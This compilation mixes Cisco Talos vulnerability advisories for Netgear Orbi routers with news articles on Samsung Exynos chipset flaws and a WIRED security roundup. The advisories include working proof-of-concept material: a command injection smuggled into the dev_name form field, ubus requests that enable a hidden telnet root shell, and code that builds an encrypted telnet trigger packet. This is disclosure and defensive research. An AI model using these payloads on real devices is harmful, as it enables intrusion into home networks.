A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

9.1 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

The access control functionality of the Orbi RBR750 allows a user to explicitly add devices (specified by MAC address and a hostname) to allow or block the specfied device when attempting to access the network. However, the dev_name parameter is vulnerable to command injection.

**Exploit Proof of Concept**

    POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1
    Host: 10.0.0.1
    Content-Length: 104
    Authorization: Basic YWRtaW46UGFzc3cwcmQ=
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866
    Connection: close
    
    action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list
    

On the device itself, we can see this command now being executed.

       root@RBR750:/tmp# ps | grep ping
       21763 root      1336 S    ping 10.0.0.4
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-37337: TALOS-2022-1596 || Cisco Talos Intelligence Group

A cleartext transmission vulnerability exists in the Remote Management functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted man-in-the-middle attack can lead to a disclosure of sensitive information.

**SUMMARY**

A cleartext transmission vulnerability exists in the Remote Management functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted man-in-the-middle attack can lead to a disclosure of sensitive information.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

6.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

**CWE**

CWE-311 - Missing Encryption of Sensitive Data

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

An option exists in the Web Services Management tool to “Always use HTTPS to access the router”. However, if a user browses to http://<router_ip>/ they are prompted for credentials before redirecting to HTTPS. In addition, the credentials must be valid in order for the redirect to proceed. Once redirected to HTTPS, the user is then prompted again for authentication, but this time over HTTPS.

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Christopher McBee and Dave McDaniel of Cisco Talos.

CVE-2022-38458: TALOS-2022-1598 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Satellite RBS750 4.6.8.5

**PRODUCT URLS**

Orbi Satellite RBS750 - https://www.netgear.com/support/product/RBS750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Interprocess communications between the router and satellite are often handled using the OpenWRT ubus library. While this is normal, there is a hidden functionality built into the satellite device that allows an attacker with knowlege of the web GUI password (or knowledge of the default password if this was unchanged), to enable and subsequently log into a hidden telnet service.

The initial step in triggering this vulnerability is to get a session using the SHA256 sum of the password with the username ‘admin’:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 217
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"<SHA256 hash of password>","timeout":900}],"jsonrpc":"2.0","id":3}
    

This will return a ‘ubus\_rpc\_session’ token needed to start the hidden telnet service:

    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 829
    Connection: close
    Date: Mon, 11 Jul 2022 19:27:03 GMT
    Server: lighttpd/1.4.45
    
    {"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
    

Once this token is retrieved we simply need to add a parameter called ‘telnet\_enable’ to start the service:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 138
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/status.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
    

**Exploit Proof of Concept**

Using the same password used earlier to generate the SHA256 hash with the username ‘admin’ will allow an attacker to log into the service:

    $ telnet 10.0.0.4
    Trying 10.0.0.4...
    Connected to 10.0.0.4.
    Escape character is '^]'.
    
    login: admin
    Password: === IMPORTANT ============================
     Use 'passwd' to set your login password
     this will disable telnet and enable SSH
    ------------------------------------------
    
    
    BusyBox v1.30.1 () built-in shell (ash)
    
         MM           NM                    MMMMMMM          M       M
       $MMMMM        MMMMM                MMMMMMMMMMM      MMM     MMM
      MMMMMMMM     MM MMMMM.              MMMMM:MMMMMM:   MMMM   MMMMM
    MMMM= MMMMMM  MMM   MMMM       MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
    MMMM=  MMMMM MMMM    MM       MMMMM    MMMM    MMMM   MMMMNMMMMM
    MMMM=   MMMM  MMMMM          MMMMM     MMMM    MMMM   MMMMMMMM
    MMMM=   MMMM   MMMMMM       MMMMM      MMMM    MMMM   MMMMMMMMM
    MMMM=   MMMM     MMMMM,    NMMMMMMMM   MMMM    MMMM   MMMMMMMMMMM
    MMMM=   MMMM      MMMMMM   MMMMMMMM    MMMM    MMMM   MMMM  MMMMMM
    MMMM=   MMMM   MM    MMMM    MMMM      MMMM    MMMM   MMMM    MMMM
    MMMM$ ,MMMMM  MMMMM  MMMM    MMM       MMMM   MMMMM   MMMM    MMMM
      MMMMMMM:      MMMMMMM     M         MMMMMMMMMMMM  MMMMMMM MMMMMMM
        MMMMMM       MMMMN     M           MMMMMMMMM      MMMM    MMMM
         MMMM          M                    MMMMMMM        M       M
           M
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
     ---------------------------------------------------------------
    root@RBS750:/# 
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-36429: TALOS-2022-1597 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Previous to recent hardware and software updates, the Netgear Orbi router series had a hidden debug page containing a toggle switch to enable the telnet service on the device http://<router ip>/debug.htm. However, recent updates have removed this switch and seemingly the ability to enable the service at all. While the switch in the GUI no longer functioned/was removed, enabling the service was still possible by sending a specially-crafted trigger packet to UDP port 23 (https://github.com/bkerler/netgear\_telnet). While recent updates have seemingly broken this tool (and the many tools like it), the service does still exist and is still triggerable.

The newer codebase uses a modified version of the Blowfish algorithm, which appears to be similar to older Nintendo DS cartridge protection code. Specifically the crypt_64bit_up/down functions with the constants 0x12, 0x112, 0x212, and 0x312 in the PoC below.

    def crypt_64bit_up(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0, 0x10):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[-2]
        y = y ^ pArray[-1]
        return (x, y)
    
    def crypt_64bit_down(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0x11, 1, -1):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[1]
        y = y ^ pArray[0]
        return (x, y) 
    

To trigger and enable this service, a username, password and MAC address of the target device’s br-lan interface are required.

**Exploit Proof of Concept**

    $ ./enable_telnet_poc.py
    Plaintext payload:
    00000000: 43 38 39 45 34 33 34 44  45 38 37 38 00 00 00 00  C89E434DE878....
    00000010: 61 64 6D 69 6E 00 00 00  00 00 00 00 00 00 00 00  admin...........
    00000020: 50 61 73 73 77 30 72 64  00 00 00 00 00 00 00 00  Passw0rd........
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    Encrypted payload:
    00000000: D0 9C 30 F6 7D 98 82 EE  8F 14 65 9F B9 03 3C 8D  ..0.}.....e...<.
    00000010: D0 56 6C C4 13 EB 29 43  84 4B BB F5 B1 B0 C5 32  .Vl...)C.K.....2
    00000020: 63 CF 65 A2 BA 4F 87 8F  7C 82 89 28 32 95 7C 64  c.e..O..|..(2.|d
    00000030: 53 20 20 62 E2 F9 4B 3D  7C 82 89 28 32 95 7C 64  S  b..K=|..(2.|d
    00000040: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000050: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000060: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000070: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    
    $ telnet 10.0.0.1
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    Escape character is '^]'.
     === LOGIN ===============================
      Please enter your account and password,
      It's the same with DUT GUI
     ------------------------------------------
    telnet account: admin
    telnet password:
    
    BusyBox v1.30.1 () built-in shell (ash)
    
      .oooooo.             .o8        o8o           .o.       ooooooo  ooooo
     d8P'  `Y8b           "888        `"'          .888.       `8888    d8'
    888      888 oooo d8b  888oooo.  oooo         .8"888.        Y888..8P
    888      888 `888""8P  d88' `88b `888        .8' `888.        `8888'
    888      888  888      888   888  888       .88ooo8888.      .8PY888.
    `88b    d88'  888      888   888  888      .8'     `888.    d8'  `888b
     `Y8bood8P'  d888b     `Y8bod8P' o888o    o88o     o8888o o888o  o88888o
    
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, 10.0.3440.3644)
     ---------------------------------------------------------------
    root@RBR750:/#
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-38452: TALOS-2022-1595 || Cisco Talos Intelligence Group

Cisco Talos recently discovered four vulnerabilities in the Netgear Orbi mesh wireless system, including the main hub router and satellite routers that extend the network’s range.

Tuesday, March 21, 2023 13:03

_Christopher McBee and Dave McDaniel of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered four vulnerabilities in the Netgear Orbi mesh wireless system, including the main hub router and satellite routers that extend the network’s range.

A mesh system allows users to set up multiple access points to the Wi-Fi in their homes using various access points. Netgear’s Orbi system connects to the user’s modem or gateway and uses “satellites” to extend the Wi-Fi signal to different places throughout the home.

Talos discovered a vulnerability in the Orbi Satellite — TALOS-2022-1596 (CVE-2022-37337) — that could lead to arbitrary command execution on the device. The user needs to authenticate into the mesh system first, meaning they’d need to access an unprotected network or the login credentials of a password-protected network, for this attack to be successful. Then, the adversary needs to send a specially crafted HTTP request to trigger the vulnerability.

Two other issues, TALOS-2022-1595 (CVE-2022-38452) and TALOS-2022-1597 (CVE-2022-36429), exist in the main Orbi router that could also lead to arbitrary command execution if the adversary sends a specially crafted network request or JSON object, respectively.

TALOS-2022-1598 (CVE-2022-38458) also exists in the router. In this case, though, an adversary can carry out a man-in-the-middle attack to trick the service’s Web Services Management tool into disclosing sensitive information.

Cisco Talos worked with Netgear to ensure that TALOS-2022-1596, TALOS-2022-1597 and TALOS-2022-1598 are resolved and an update is available for affected customers. However, the company is still developing a patch for TALOS-2022-1595, though we are disclosing this vulnerability according to our 90-day timeline outlined in Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: Netgear Orbi Satellite RBS750, version 4.6.8.5. Talos tested and confirmed these versions of the Orbi system could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against this vulnerability: 60474 – 60477 and 60499. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.

Vulnerability Spotlight: Netgear Orbi router vulnerable to arbitrary command execution

Users of affected devices that want to mitigate risk from the security issues in the Exynos chipsets can turn off Wi-Fi and Voice-over-LTE settings, researchers from Google's Project Zero say.

A newly disclosed set of vulnerabilities in Samsung chipsets has exposed millions of Android mobile phone users to potential remote code execution (RCE) attacks, until their individual device vendors make patches available for the flaws.

Until then, the best bet for users who want to protect against the threat is to turn off Wi-Fi calling and Voice-over-LTE settings on their devices, according to the researchers from Google's Project Zero who discovered the flaws.

In a blog post last week, the researchers said they had reported as many as 18 vulnerabilities to Samsung in the company's Exynos chipsets, used in multiple mobile phone models from Samsung, Vivo, and Google. Affected devices include Samsung Galaxy S22, M33, M13, M12, A71, and A53, Vivo S16, S15, S6, X70, X60, and X30, and Google's Pixel 6 and Pixel 7 series of devices.

**Android Users Face Complete Compromise**

Four of the vulnerabilities in the Samsung Exynos chipsets give attackers a way to completely compromise an affected device, with no user interaction needed and requiring the attacker to only know the victim's phone number, Project Zero threat researcher Tim Willis wrote.

"Tests conducted by Project Zero confirm that those four vulnerabilities \[CVE-2023-24033, CVE-2023-26496, CVE-2023-26497, and CVE-2023-26498\] allow an attacker to remotely compromise a phone at the baseband level," Willis said. "With limited additional research and development, we believe that skilled attackers would be able to quickly create an operational exploit to compromise affected devices silently and remotely." 

The security researcher identified the remaining 14 vulnerabilities in Samsung Exynos chipsets as being somewhat less severe.

In an emailed statement, Samsung said it had identified six of the vulnerabilities as potentially impacting some of its Galaxy devices. The company described the six flaws as not being "severe" and said it had released patches for five of them in a March security update. Samsung will release a patch for the sixth flaw in April. The company did not respond to a Dark Reading request seeking information on whether it will release patches for all 18 vulnerabilities that Google disclosed. It's also unclear whether, or when, all affected Samsung Galaxy devices will receive the updates.

Willis said affected Google Pixel devices had already received a fix for one of the disclosed flaws (CVE-2023-24033) with the company's March 2023 security update. Google did not immediately respond to a Dark Reading request for information on when patches would be available for the remaining vulnerabilities. Vivo did not respond immediately to a Dark Reading request either, so the company's plans for addressing the vulnerabilities remain unclear as well.

**The Android Patch Gap Problem**

In the past, device vendors have taken their time addressing vulnerabilities in the Android ecosystem. So, if that's any indication, users affected by the vulnerabilities in the Samsung chipset could be in for a long wait. 

In November, Project Zero researchers reported on what they described a significant patch gap resulting from the delay between when a firmware patch for an Android device becomes available and when a device vendor actually makes it available for their users. As an example, Project Zero researchers pointed to several vulnerabilities they discovered in the ARM Mali GPU driver. Google reported the vulnerabilities to ARM last June and July, after which the latter issued patches for the flaws in July and August. Yet more than three months later, in November, when Google tested affected devices for the vulnerability, the researchers found every single device still vulnerable to the issues.

"The easy part is fixing the hardware flaws with new software," says Ted Miracco, CEO at Approov. "The harder part is getting manufacturers to push the updates to the end users and getting end users to update their devices," he says. Unfortunately, many users of the chipsets may not be quick to patch the devices and users are probably largely unaware if the vulnerabilities, he says.

Vulnerabilities like the ones Project Zero discovered in the Samsung chipsets exist not only in the Android ecosystem, but in the iOS ecosystem and any complex supply chain involving sophisticated hardware and software as well, Miracco continues. The challenge is reducing the time from detecting flaws to deploying solutions on all devices. 

"This is an area where the Android ecosystem needs to put a lot attention, as updates can be few and far between with many manufacturers of mobile devices," he says. Enterprises could mandate that users who bring their own devices (BYOD) to work must utilize devices from approved suppliers that have a track record of rapidly deploying updates, Miracco adds.

Krishna Vishnubhotla, vice president of product strategy at Zimperium, says vulnerabilities like these highlight the need for enterprises to evaluate their mobile security strategies. "It makes sense for enterprises to guide their employees on how to stay safe and if there are new requirements for enterprise access," he notes.

With so much original equipment manufacturer (OEM) fragmentation in the Android space, the patches might only be available after a few months for all the vulnerabilities discovered. "This is why it's important for enterprises to invest in security that can handle zero-day threats and can be updated over the air," Vishnubhotta adds.

Unpatched Samsung Chipset Vulnerabilities Open Android Users to RCE Attacks

By Deeba Ahmed
In addition to Google Pixel and Samsung devices, Vivo devices were also vulnerable to this attack.
This is a post from HackRead.com Read the original post: Hackers can hijack Samsung and Pixel phones by knowing phone number

****The cybersecurity researchers at Google identified eighteen zero-day vulnerabilities, four of which allowed Hackers to remotely compromise smartphone devices using just the victim’s phone number.****

Google Pixel and Samsung phone owners should be cautious, as Google’s bug-hunting team, Project Zero, has discovered as many as 18 security vulnerabilities impacting Exynos modems.

Reportedly, these vulnerabilities, if combined, can allow an adversary to gain complete control over a smartphone without alerting the user. The devices vulnerable to these vulnerabilities include the following:

*   Google Pixel 6 and Pixel 7 series
*   Vivo S16, S15, S6, X70, X60, and X30 series
*   Samsung S22, M33, M13, M12, A71, A53, A33, A21, A13, A12, and A04 series.

In addition, wearable devices using the Exynos W20 chipset, such as Galaxy Watch 4 and 5, and vehicles using the Exynos Auto T5123 chipset are also vulnerable.

According to Project Zero head Tim Willis, these zero-day vulnerabilities were found in late 2022 and early 2023. Out of the 18 security flaws, four allow attackers to compromise the phone remotely using just the victim’s phone number.

In addition, skilled threat actors can create an operational exploit quickly to “silently and remotely” compromise impacted devices. These four flaws are the most crucial of all.

> Tests conducted by Project Zero confirm that those four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker knows the victim’s phone number.
> 
> Google Project Zero

One of the exploits has been assigned a CVE (Common Vulnerabilities and Exposures) number, CVE-2023-24033, and Google has withheld it, which is a rare instance considering its previous bug disclosures. In this flaw, the impacted baseband model chipsets don’t check the format types that the SDP module specifies, leading to a denial of service attack.

Hence, an attacker can remotely lock the phone and bar the user from using it. It was fixed in Google’s March 2023 security update and has already been implemented in Pixel 7 series phones. However, Pixel 6 series, including Pixel 6 Pro, and Pixel 6a, do not yet have it.

The other 14 vulnerabilities aren’t as critical. Some have been assigned CVEs, including CVE-2023-26072, CVE-2023-26073, CVE-2023-26074, CVE-2023-26075, and CVE-2023-26076, while 9 are still awaiting CVEs.

It is worth noting that attackers would need a malicious mobile network operator or local access to the device to exploit them. Although it may sound impossible, a report from June 2022 shows that ISPs have been assisting malicious threat actors in installing malware on victim devices.

The good news, according to Google’s blog post, for Samsung Galaxy S22 owners in the US is that their phones don’t have a Samsung Exynos chipset but a Qualcomm chipset, so their devices aren’t vulnerable. However, European owners of the same phone are not as lucky. Therefore, those using unpatched devices must disable Wi-Fi Calling and VoLTE (voice over LTE).

1.  Hacking Honda and Nissan Cars by Knowing VIN number
2.  Hacking Facebook Account by Knowing its Phone Number
3.  New attack vector ReVoLTE lets hackers monitor phone calls
4.  Hacker finds Aussie PM’s passport number using his Instagram
5.  PlayStation serial number leads Feds to bust a massive drug ring

Hackers can hijack Samsung and Pixel phones by knowing phone number

Categories: News
Tags: android

Tags:  google

Tags:  samsung

Tags:  chip

Tags:  VoLTE

Tags:  modem

Tags:  chipset

Tags:  vulnerability

Tags:  pixel

Tags:  CVE-2023-24033

We take a look at multiple vulnerabilities highlighted by Google's Project Zero team, and what you can do to ward off the threat of attack.



(Read more...)




The post Google reveals 18 chip vulnerabilities threatening mobile, wearables, vehicles appeared first on Malwarebytes Labs.

Google’s Project Zero is warning of multiple significant vulnerabilities found across many models of mobile devices including Samsung Galaxy, Google Pixel, Vivo, and several forms of wearable and vehicles using certain types of components.

Between late 2022 and early 2023, Project Zero reported 18 vulnerabilities in a chip powering those devices. Of those 18, a total of four vulnerabilities are tagged as “top-severity” which could allow for silent compromise over the network.

**Which devices are affected?**

The list of impacted technology is as follows:

*   Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series
*   Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series
*   The Pixel 6 and Pixel 7 series of devices from Google
*   Any vehicles that use the Exynos Auto T5123 chipset

The four most severe vulnerabilities could allow attackers to remotely compromise a device, with no physical interaction required at any stage of the proceedings. The only thing an attacker requires for the compromise to take place is knowledge of the intended victim’s phone number.

The other fourteen, while still bad, are nowhere near as severe, and for them to be successful requires either a malicious mobile network operator or an attacker with local access to the device.

Meanwhile, the Google Security research team believes that the most severe vulnerabilities would allow skilled attackers to create an operational exploit in a short space of time.

**Patching and scope of threat**

While Google mentions that patching will be dependent on manufacturer, PIxel phones (for example) have already been patched against CVE-2023-24033 in the March security update. If a patch isn’t forthcoming for your own device yet, Google has some suggestions to help keep your technology safe from harm. If your device allows you to, switch off two settings called:

*   Wi-Fi calling
*   Voice-over-LTE (VoLTE)

This will prevent the risk of exploitation. One potential ramification of disabling VoLTE is that in recent years it has become something of a necessity for some mobile networks. If you’re able to turn it off, then based on the information available you may experience poor call quality and lack of certain features and functionality. On the other hand, VoLTE is “not available everywhere on every network, or on every handset” so it may not matter too much anyway depending on your make and model.

As for scope, depending on where your device is from you may not be running the vulnerable type of chip needed for the exploit to be successful. The Verge notes that phones sold outside of Europe and some African countries” use something else altogether. In those instances, you should be fine.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Google reveals 18 chip vulnerabilities threatening mobile, wearables, vehicles

Plus: A SpaceX supplier ransom, critical vulnerabilities in dozens of Android phones, and more.

What’s more controversial than a popular surveillance camera maker that has an uncomfortably cozy relationship with American police? When ransomware hackers claim to have breached that company—Amazon-owned camera maker Ring—stolen its data, and Ring responds by denying the breach.

But we’ll get to that.

Five years ago, police in the Netherlands caught members of Russia’s GRU military intelligence red-handed as they tried to hack the Organization for the Prohibition of Chemical Weapons in The Hague. The team had parked a rental car outside the organization’s building and hid a Wi-Fi snooping antenna in its trunk. Within the GRU group was Evgenii Serebriakov, who was caught with further Wi-Fi hacking tools in his backpack.

Since then, surprisingly, Serebriakov has only risen in status. This week, Western intelligence sources told WIRED that Serebriakov is now the new leader of one of the world’s most aggressive hacking units. Serebriakov took over Sandworm, which is responsible for some of the worst cyberattacks in history, in the spring of 2022. His elevation to the senior role, experts say, shows how small the pool of skilled nation-state hackers is likely to be and demonstrates Serebriakov’s value to Russia.

Nowhere on the internet is free from threats—and that includes LinkedIn. This week we looked at how spies, scammers, and hackers from Iran, North Korea, Russia, and China are using the professional network to scout and approach intelligence targets. In addition, LinkedIn is plagued with thousands of suspicious accounts; it removed hundreds from WIRED’s profile when we reported them.

The Western clampdown on TikTok is continuing—this week the UK joined the US, Belgium, Canada, and the European Union in banning the social media app from being used on government devices. But in the US, Senator Mark Warner is trying to pass legislation, in the guise of the bipartisan Restrict Act, that will allow officials to ban apps and services from six “hostile” nations: China, Russia, North Korea, Iran, Cuba, and Venezuela. We sat down with Warner and asked about the plans.

A WIRED analysis of “cybercrime” cases across the US shows how vague and wide-ranging the term can be. Without a clear and universal definition of cybercrime, human rights and civil liberties issues may expand globally. Speaking of criminals, scammers are getting better at using voice deepfakes to con people. And ransomware gangs are sinking to a new deplorable low. As more and more companies and organizations refuse to pay ransoms, criminal gangs are increasingly using extortion as leverage: they are now releasing photos stolen from cancer patients and sensitive student records. 

But wait, there's more. Each week, we round up the security news we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

ALPHV, a prolific group of hackers who extort companies with ransomware and leak their stolen data, said earlier this week that it had breached security camera maker Ring and threatened to dump the company’s data online if it doesn’t pay. “There’s always an option to let us leak your data …” the hackers wrote in a message to Ring on their leak site. Ring has so far responded with a denial, telling Vice’s Motherboard, “We currently have no indications of a ransomware event,” but it says it’s aware of a third-party vendor that has experienced one. That vendor, Ring says, doesn’t have access to any customer records. 

Meanwhile, ALPHV, which has previously used its BlackCat ransomware to target companies like Bandai Namco, Swissport, and hospital firm Lehigh Valley Health Network, stands by its claim to have breached Ring itself, not a third-party vendor. A member of the malware research group VX-Underground shared with WIRED screenshots of a conversation with an ALPHV representative who says that it’s still in “negotiations” with Ring.

Amid the ongoing ransomware epidemic, it’s no surprise that Ring isn’t alone in facing extortion problems. So too is Maximum Industries, a supplier of rocket parts for Elon Musk’s SpaceX. The hackers, a well-known ransomware gang known as LockBit, taunted Musk on their website, threatening to sell the stolen information to the highest bidder if Maximum doesn’t pay by their March 20 deadline. “I would say we were lucky if Space-X contractors were more talkative. But I think this material will find its buyer as soon as possible,” the hackers wrote. “Elon Musk we will help you sell your drawings to other manufacturers.”

